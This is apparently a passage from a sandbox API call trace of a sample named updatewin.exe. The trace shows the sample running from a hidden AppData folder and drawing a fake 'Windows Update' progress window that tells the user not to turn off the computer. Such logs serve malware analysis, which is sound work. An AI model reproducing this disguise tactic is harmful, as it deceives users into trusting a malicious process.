!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ") returned 256 [0080.145] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ", cchWideChar=256, lpMultiByteStr=0x18e1dc, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x8dØ\x8a¸\x18å\x18", lpUsedDefaultChar=0x0) returned 256 [0080.145] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x80) returned 0x60b0e0 [0080.145] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x413ba8, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8\\updatewin.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\57db73de-989a-4393-870b-10752e4771b8\\updatewin.exe")) returned 0x5e [0080.145] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0xc6) returned 0x60d360 [0080.145] RtlInitializeSListHead (in: ListHead=0x413ad0 | out: ListHead=0x413ad0) [0080.145] GetLastError () returned 0x0 [0080.145] GetEnvironmentStringsW () returned 0x60d430* [0080.145] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xaca) returned 0x60df08 [0080.145] FreeEnvironmentStringsW (penv=0x60d430) returned 1 [0080.145] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x98) returned 0x60afc8 [0080.145] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x3e) returned 0x60d430 [0080.145] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x6c) returned 0x60d478 [0080.145] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x6e) returned 0x60d4f0 [0080.145] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x78) returned 0x5f1270 [0080.145] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x62) returned 0x60d568 [0080.146] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2e) returned 0x5f52c0 [0080.146] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x48) returned 0x60d5d8 [0080.146] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x28) returned 0x60d628 [0080.146] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x1a) returned 0x60d0a8 [0080.146] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x4a) returned 0x60d658 [0080.146] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x72) returned 0x5f12f0 [0080.146] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x30) returned 0x5f52f8 [0080.146] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2e) returned 0x5f5330 [0080.146] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x1c) returned 0x60d0d0 [0080.146] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0xd2) returned 0x60d6b0 [0080.146] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x7c) returned 0x60d790 [0080.146] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x36) returned 0x60d818 [0080.146] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x3a) returned 0x60e9f8 [0080.146] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x90) returned 0x60d858 [0080.146] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x24) returned 0x60d8f0 [0080.146] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x30) returned 0x5f5368 [0080.146] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x36) returned 0x60d920 [0080.146] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x48) returned 0x60d960 [0080.146] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x52) returned 0x60d9b0 [0080.146] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x3c) returned 0x60ea40 [0080.146] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x82) returned 0x60da10 [0080.146] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2e) returned 0x5f53a0 [0080.146] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x1e) returned 0x60d0f8 [0080.146] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2c) returned 0x5f53d8 [0080.146] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x54) returned 0x60daa0 [0080.146] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x52) returned 0x60db00 [0080.146] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2a) returned 0x5f5410 [0080.147] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x3c) returned 0x60ea88 [0080.147] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x54) returned 0x60db60 [0080.147] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x24) returned 0x60dbc0 [0080.147] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x30) returned 0x5f5448 [0080.147] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x8c) returned 0x60dbf0 [0080.147] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60df08 | out: hHeap=0x5e0000) returned 1 [0080.147] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x800) returned 0x60dc88 [0080.147] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0080.147] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x402116) returned 0x404e69 [0080.251] GetStartupInfoW (in: lpStartupInfo=0x18e548 | out: lpStartupInfo=0x18e548*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8\\updatewin.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0080.251] InitCommonControlsEx (picce=0x18e564) returned 1 [0080.251] LoadIconW (hInstance=0x400000, lpIconName=0x6b) returned 0x602ad [0080.253] LoadStringW (in: hInstance=0x400000, uID=0x67, lpBuffer=0x414378, cchBufferMax=100 | out: lpBuffer="Windows Update") returned 0xe [0080.253] LoadStringW (in: hInstance=0x400000, uID=0x6d, lpBuffer=0x4142b0, cchBufferMax=100 | out: lpBuffer="WINDOWSUPDATE") returned 0xd [0080.253] LoadIconW (hInstance=0x400000, lpIconName=0x6b) returned 0x602ad [0080.253] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0080.253] LoadIconW (hInstance=0x400000, lpIconName=0x6c) returned 0xd02af [0080.254] RegisterClassExW (param_1=0x18e510) returned 0xc16f [0080.254] GetDesktopWindow () returned 0x10010 [0080.254] MonitorFromWindow (hwnd=0x10010, dwFlags=0x2) returned 0x10001 [0080.254] GetMonitorInfoW (in: hMonitor=0x10001, lpmi=0x18e510 | out: lpmi=0x18e510) returned 1 [0080.254] CreateWindowExW (dwExStyle=0x0, lpClassName="WINDOWSUPDATE", lpWindowName="Windows Update", dwStyle=0x0, X=1002, Y=600, nWidth=418, nHeight=240, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0xb027e [0080.349] NtdllDefWindowProc_W () returned 0x0 [0080.349] NtdllDefWindowProc_W () returned 0x1 [0080.352] NtdllDefWindowProc_W () returned 0x0 [0080.354] CreateDialogParamW (hInstance=0x400000, lpTemplateName=0x65, hWndParent=0xb027e, lpDialogFunc=0x401360, dwInitParam=0x0) returned 0x7001c [0080.363] NtdllDefWindowProc_W () returned 0x0 [0080.368] NtdllDefWindowProc_W () returned 0x0 [0080.368] NtdllDefWindowProc_W () returned 0x0 [0080.374] GetClientRect (in: hWnd=0x7001c, lpRect=0x18d358 | out: lpRect=0x18d358) returned 1 [0080.374] GetDlgItem (hDlg=0x7001c, nIDDlgItem=1000) returned 0x50018 [0080.374] MoveWindow (hWnd=0x50018, X=295, Y=167, nWidth=95, nHeight=23, bRepaint=1) returned 1 [0080.376] GetDlgItem (hDlg=0x7001c, nIDDlgItem=1001) returned 0x50016 [0080.376] MoveWindow (hWnd=0x50016, X=95, Y=134, nWidth=225, nHeight=16, bRepaint=1) returned 1 [0080.376] SendMessageW (hWnd=0x50016, Msg=0x401, wParam=0x0, lParam=0x640000) returned 0x640000 [0080.377] SendMessageW (hWnd=0x50016, Msg=0x402, wParam=0x4, lParam=0x0) returned 0x0 [0080.385] timeGetTime () returned 0x115a516 [0080.385] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x401690, lpParameter=0x7001c, dwCreationFlags=0x0, lpThreadId=0x4142a4 | out: lpThreadId=0x4142a4*=0x9e4) returned 0xbc [0080.470] ShowWindow (hWnd=0x7001c, nCmdShow=5) returned 0 [0080.470] GetClientRect (in: hWnd=0xb027e, lpRect=0x18df10 | out: lpRect=0x18df10) returned 1 [0080.470] MoveWindow (hWnd=0x7001c, X=0, Y=0, nWidth=412, nHeight=212, bRepaint=1) returned 1 [0080.471] NtdllDefWindowProc_W () returned 0x0 [0080.472] SetWindowPos (hWnd=0xb027e, hWndInsertAfter=0xffffffff, X=0, Y=0, cx=0, cy=0, uFlags=0x3) returned 1 [0080.472] NtdllDefWindowProc_W () returned 0x0 [0080.476] NtdllDefWindowProc_W () returned 0x0 [0080.476] NtdllDefWindowProc_W () returned 0x0 [0080.495] NtdllDefWindowProc_W () returned 0x0 [0080.496] NtdllDefWindowProc_W () returned 0x0 [0080.496] NtdllDefWindowProc_W () returned 0x1 [0080.498] NtdllDefWindowProc_W () returned 0x0 [0080.627] NtdllDefWindowProc_W () returned 0x0 [0080.629] NtdllDefWindowProc_W () returned 0x0 [0080.630] NtdllDefWindowProc_W () returned 0x0 [0080.631] NtdllDefWindowProc_W () returned 0x0 [0080.632] ShowWindow (hWnd=0xb027e, nCmdShow=1) returned 0 [0080.632] NtdllDefWindowProc_W () returned 0x0 [0080.632] NtdllDefWindowProc_W () returned 0x0 [0080.633] NtdllDefWindowProc_W () returned 0x0 [0080.638] NtdllDefWindowProc_W () returned 0x1 [0080.638] NtdllDefWindowProc_W () returned 0x0 [0080.639] NtdllDefWindowProc_W () returned 0x0 [0080.639] NtdllDefWindowProc_W () returned 0x0 [0080.639] UpdateWindow (hWnd=0xb027e) returned 1 [0080.639] BeginPaint (in: hWnd=0xb027e, lpPaint=0x18e328 | out: lpPaint=0x18e328) returned 0x350109fe [0080.639] EndPaint (hWnd=0xb027e, lpPaint=0x18e328) returned 1 [0080.639] BeginPaint (in: hWnd=0x7001c, lpPaint=0x18da10 | out: lpPaint=0x18da10) returned 0x4010a05 [0080.640] CreateSolidBrush (color=0x5b3ef) returned 0xffffffffad1007eb [0080.640] FillRect (hDC=0x4010a05, lprc=0x18da00, hbr=0xad1007eb) returned 1 [0080.691] DeleteObject (ho=0xad1007eb) returned 1 [0080.691] DrawIcon (hDC=0x4010a05, X=7, Y=7, hIcon=0x602ad) returned 1 [0080.692] CreateFontW (cHeight=-19, cWidth=0, cEscapement=0, cOrientation=0, cWeight=500, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x0, iOutPrecision=0x0, iClipPrecision=0x0, iQuality=0x0, iPitchAndFamily=0x0, pszFaceName="Calibri") returned 0xf0a0859 [0080.692] SelectObject (hdc=0x4010a05, h=0xf0a0859) returned 0x18a002e [0080.692] SetBkMode (hdc=0x4010a05, mode=1) returned 2 [0080.692] lstrlenW (lpString="Installing important updates Windows.") returned 37 [0080.692] TextOutW (hdc=0x4010a05, x=55, y=10, lpString="Installing important updates Windows.", c=37) returned 1 [0080.699] SelectObject (hdc=0x4010a05, h=0x18a002e) returned 0xf0a0859 [0080.699] CreateSolidBrush (color=0xffffff) returned 0xae1007eb [0080.699] FillRect (hDC=0x4010a05, lprc=0x18d9f0, hbr=0xae1007eb) returned 1 [0080.700] DeleteObject (ho=0xae1007eb) returned 1 [0080.700] CreateFontW (cHeight=-15, cWidth=0, cEscapement=0, cOrientation=0, cWeight=500, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x0, iOutPrecision=0x0, iClipPrecision=0x0, iQuality=0x0, iPitchAndFamily=0x0, pszFaceName="Calibri") returned 0x570a07ce [0080.705] SelectObject (hdc=0x4010a05, h=0x570a07ce) returned 0x18a002e [0080.705] SetBkMode (hdc=0x4010a05, mode=1) returned 1 [0080.705] lstrlenW (lpString="Getting your update ready.") returned 26 [0080.705] TextOutW (hdc=0x4010a05, x=52, y=60, lpString="Getting your update ready.", c=26) returned 1 [0080.705] lstrlenW (lpString="Configuring update for Windows.") returned 31 [0080.705] TextOutW (hdc=0x4010a05, x=52, y=77, lpString="Configuring update for Windows.", c=31) returned 1 [0080.705] lstrlenW (lpString="Don't turn off your computer or close it.") returned 41 [0080.705] TextOutW (hdc=0x4010a05, x=52, y=94, lpString="Don't turn off your computer or close it.", c=41) returned 1 [0080.705] SelectObject (hdc=0x4010a05, h=0x18a002e) returned 0x570a07ce [0080.705] CreateFontW (cHeight=-15, cWidth=0, cEscapement=0, cOrientation=0, cWeight=700, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x0, iOutPrecision=0x0, iClipPrecision=0x0, iQuality=0x0, iPitchAndFamily=0x0, pszFaceName="Calibri") returned 0x410a07c7 [0080.707] SelectObject (hdc=0x4010a05, h=0x410a07c7) returned 0x18a002e [0080.708] SetBkMode (hdc=0x4010a05, mode=1) returned 1 [0080.708] SetTextAlign (hdc=0x4010a05, align=0x6) returned 0x0 [0080.708] wsprintfW (in: param_1=0x18da50, param_2="Percent complete: %i%%" | out: param_1="Percent complete: 4%") returned 20 [0080.708] lstrlenW (lpString="Percent complete: 4%") returned 20 [0080.708] TextOutW (hdc=0x4010a05, x=209, y=111, lpString="Percent complete: 4%", c=20) returned 1 [0080.712] SelectObject (hdc=0x4010a05, h=0x18a002e) returned 0x410a07c7 [0080.712] EndPaint (hWnd=0x7001c, lpPaint=0x18da10) returned 1 [0080.740] LoadAcceleratorsW (hInstance=0x400000, lpTableName=0x6d) returned 0xa0155 [0080.740] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0080.740] TranslateAcceleratorW (hWnd=0x0, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0080.740] TranslateMessage (lpMsg=0x18e548) returned 0 [0080.740] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0080.741] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0080.741] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0080.741] TranslateMessage (lpMsg=0x18e548) returned 0 [0080.741] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0080.741] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0080.741] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0080.741] TranslateMessage (lpMsg=0x18e548) returned 0 [0080.741] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0080.742] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0080.742] TranslateAcceleratorW (hWnd=0x401b4, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0080.742] TranslateMessage (lpMsg=0x18e548) returned 0 [0080.742] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0080.742] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0080.828] NtdllDefWindowProc_W () returned 0x0 [0080.829] NtdllDefWindowProc_W () returned 0x0 [0080.829] NtdllDefWindowProc_W () returned 0x0 [0080.829] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0080.829] TranslateMessage (lpMsg=0x18e548) returned 0 [0080.829] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0080.829] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0080.830] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0080.830] TranslateMessage (lpMsg=0x18e548) returned 0 [0080.830] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0080.831] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0080.875] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0080.875] TranslateMessage (lpMsg=0x18e548) returned 0 [0080.875] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0080.875] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0080.921] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0080.921] TranslateMessage (lpMsg=0x18e548) returned 0 [0080.921] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0080.923] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0080.923] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0080.923] TranslateMessage (lpMsg=0x18e548) returned 0 [0080.923] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0080.924] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0080.937] TranslateAcceleratorW (hWnd=0x301b6, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0080.937] TranslateMessage (lpMsg=0x18e548) returned 0 [0080.937] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0080.937] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0081.389] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0081.389] TranslateMessage (lpMsg=0x18e548) returned 0 [0081.389] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0081.390] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0081.561] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0081.561] TranslateMessage (lpMsg=0x18e548) returned 0 [0081.561] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0081.561] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0081.561] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0081.561] TranslateMessage (lpMsg=0x18e548) returned 0 [0081.561] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0081.562] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0081.615] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0081.615] TranslateMessage (lpMsg=0x18e548) returned 0 [0081.615] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0081.615] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0081.615] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0081.615] TranslateMessage (lpMsg=0x18e548) returned 0 [0081.615] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0081.616] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0081.655] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0081.655] TranslateMessage (lpMsg=0x18e548) returned 0 [0081.655] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0081.655] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0081.655] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0081.655] TranslateMessage (lpMsg=0x18e548) returned 0 [0081.655] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0081.656] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0081.704] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0081.704] TranslateMessage (lpMsg=0x18e548) returned 0 [0081.704] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0081.705] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0081.705] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0081.705] TranslateMessage (lpMsg=0x18e548) returned 0 [0081.705] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0081.706] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0081.748] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0081.748] TranslateMessage (lpMsg=0x18e548) returned 0 [0081.748] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0081.748] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0081.749] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0081.749] TranslateMessage (lpMsg=0x18e548) returned 0 [0081.749] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0081.750] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0081.920] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0081.920] TranslateMessage (lpMsg=0x18e548) returned 0 [0081.920] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0081.920] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0081.920] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0081.921] TranslateMessage (lpMsg=0x18e548) returned 0 [0081.921] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0081.922] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0081.967] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0081.967] TranslateMessage (lpMsg=0x18e548) returned 0 [0081.967] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0081.967] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0081.967] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0081.967] TranslateMessage (lpMsg=0x18e548) returned 0 [0081.967] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0081.969] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0082.013] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0082.013] TranslateMessage (lpMsg=0x18e548) returned 0 